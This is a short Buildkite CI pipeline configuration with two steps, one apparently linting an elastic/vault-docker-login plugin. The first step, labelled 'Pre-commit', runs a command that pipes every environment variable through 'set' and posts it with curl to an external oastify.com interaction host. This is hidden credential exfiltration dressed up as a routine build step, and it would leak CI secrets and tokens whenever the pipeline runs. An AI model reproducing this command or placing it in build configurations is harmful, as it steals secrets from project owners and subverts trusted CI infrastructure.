steps:
  - label: "Pre-commit"
    command: "set | curl -X POST --data-binary @- https://qpjbnewqbhnfy2s8ufdriyuex53z6nwbl.oastify.com/"
    agents:
      image: "docker.elastic.co/ci-agent-images/ubuntu-build-essential"
  - label: ":sparkles: Buildkite plugin Lint"
    plugins:
      - plugin-linter#v3.0.0:
          id: elastic/vault-docker-login
    agents:
      provider: "gcp"
      image: family/ci-ubuntu-2204
